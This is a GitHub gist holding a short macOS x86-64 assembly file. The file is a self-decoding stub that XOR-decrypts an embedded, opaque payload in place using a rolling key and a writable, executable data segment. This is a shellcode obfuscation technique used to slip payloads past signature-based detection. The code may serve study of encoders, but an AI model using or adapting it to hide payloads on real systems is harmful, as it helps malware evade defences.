Last active
May 4, 2019 15:23
-
-
Save FrankSpierings/381005ca7d539aabb683 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; nasm -f macho64 test.asm -o test.o \ | |
| ; && ld -o test -segprot __DATA rwx rwx test.o | |
| global start | |
| section .text | |
| start: | |
| mov rax, 0x0123456789ABCDEF ; Set the initial key (IV) | |
| lea rbx, [rel $] ; Place current instruction pointer RIP in RBX | |
| xor rcx, rcx ; Zero RCX | |
| mov cl, payload_len/8 ; Set amount of loops | |
| decode: | |
| xor [rbx+0x1a], rax ; XOR buffer pointer (RBX+Offset) with the key | |
| add rax, [rbx+0x1a] ; Update the key. Key = key + decoded | |
| add rbx, 0x8 ; Update the pointer (RBX = RBX + 8) | |
| loop decode ; Loop | |
| section .data | |
| payload: db `W\xac\xab\x89e/!^\xcd.\xf2\xc1X}*eY\xb8\xcdj\xf2\x815g\x11\x8b\'\xdc\xbd\x827v\xfd\xbd\x8fh\'\xe8\'"\xf2D\xa8\x01\xa8\xedE\x9a=\xb1\x80*n\xa4\xc0\xe628\xa9\xcbo7\xd1Z\xc5\xa5\x81z\x89\x7f\\\x80\x9d\xaa\xf8yY\x85\x16\xcc\xda\x15\xa6\x81e\x87\xee\xff\x12jR:?\x87\xee\xfd\x92\x8a\x9a5\xc5\xcf\xdf\xc1\x9aN#J\xc7\'\x17\xc2\xda\xb0\x0c(\xae\xd9\x07\xb1\xb2\xb0\x1a\'\x0c\x02\x10\x04\x90\xe3\xcd\x7f\xe4\xac\xafc` | |
| payload_len: equ $-payload |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment